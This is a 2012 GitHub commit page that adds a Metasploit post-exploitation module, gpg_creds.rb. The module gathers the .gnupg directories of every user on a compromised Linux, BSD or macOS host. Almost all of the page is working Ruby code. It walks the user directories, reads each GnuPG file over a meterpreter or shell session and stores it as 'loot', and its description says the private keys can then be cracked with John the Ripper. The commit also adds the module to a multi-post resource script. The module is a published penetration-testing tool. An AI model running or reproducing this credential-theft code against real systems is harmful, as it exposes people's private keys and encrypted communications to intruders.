Permalink
Browse files

GnuPG Information Gather Module, tested against Linux

  • Loading branch information...
kholia committed Oct 2, 2012
1 parent a526e3d commit 80bcf930e38d4522e75ca08321450bb02e63f87f
Showing with 79 additions and 0 deletions.
  1. +78 −0 modules/post/multi/gather/gpg_creds.rb
  2. +1 −0 scripts/resource/multi_post.rc
@@ -0,0 +1,78 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/file'
+require 'msf/core/post/common'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::File
+ include Msf::Post::Common
+ include Msf::Post::Unix
+
+ def initialize(info={})
+ super( update_info(info,
+ 'Name' => 'Multi Gather GnuPG Credentials Collection',
+ 'Description' => %q{
+ This module will collect the contents of user's .gpg directory on the targeted
+ machine. Password protected private key files can be cracked with JtR.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Dhiru Kholia <dhiru at openwall.com>'],
+ 'Version' => "$Revision$",
+ 'Platform' => ['linux', 'bsd', 'unix', 'osx'],
+ 'SessionTypes' => ['meterpreter', 'shell' ]
+ ))
+ end
+
+ # This module is largely based on ssh_creds and firefox_creds.rb.
+
+ def run
+ print_status("Finding .gnupg directories")
+ paths = enum_user_directories.map {|d| d + "/.gnupg"}
+ # Array#select! is only in 1.9
+ paths = paths.select { |d| directory?(d) }
+
+ if paths.nil? or paths.empty?
+ print_error("No users found with a .gnupg directory")
+ return
+ end
+
+ download_loot(paths)
+ end
+
+ def download_loot(paths)
+ print_status("Looting #{paths.count} directories")
+ paths.each do |path|
+ path.chomp!
+ if session.type == "meterpreter"
+ sep = session.fs.file.separator
+ files = session.fs.dir.entries(path)
+ else
+ # Guess, but it's probably right
+ sep = "/"
+ files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
+ end
+
+ files.each do |file|
+ print_good("Downloading #{path}#{sep}#{file} -> #{file}")
+ data = read_file("#{path}#{sep}#{file}")
+ file = file.split(sep).last
+ loot_path = store_loot("gpg.#{file}", "text/plain", session, data,
+ "gpg_#{file}", "GnuPG #{file} File")
+ end
+
+ end
+ end
+
+end
@@ -78,6 +78,7 @@ if (framework.datastore['MOD_MULTI'] != nil)
else
modules_multi = [
'post/multi/gather/env',
+ 'post/multi/gather/gpg_creds',
'post/multi/gather/ssh_creds'
]
end

0 comments on commit 80bcf93

Please sign in to comment.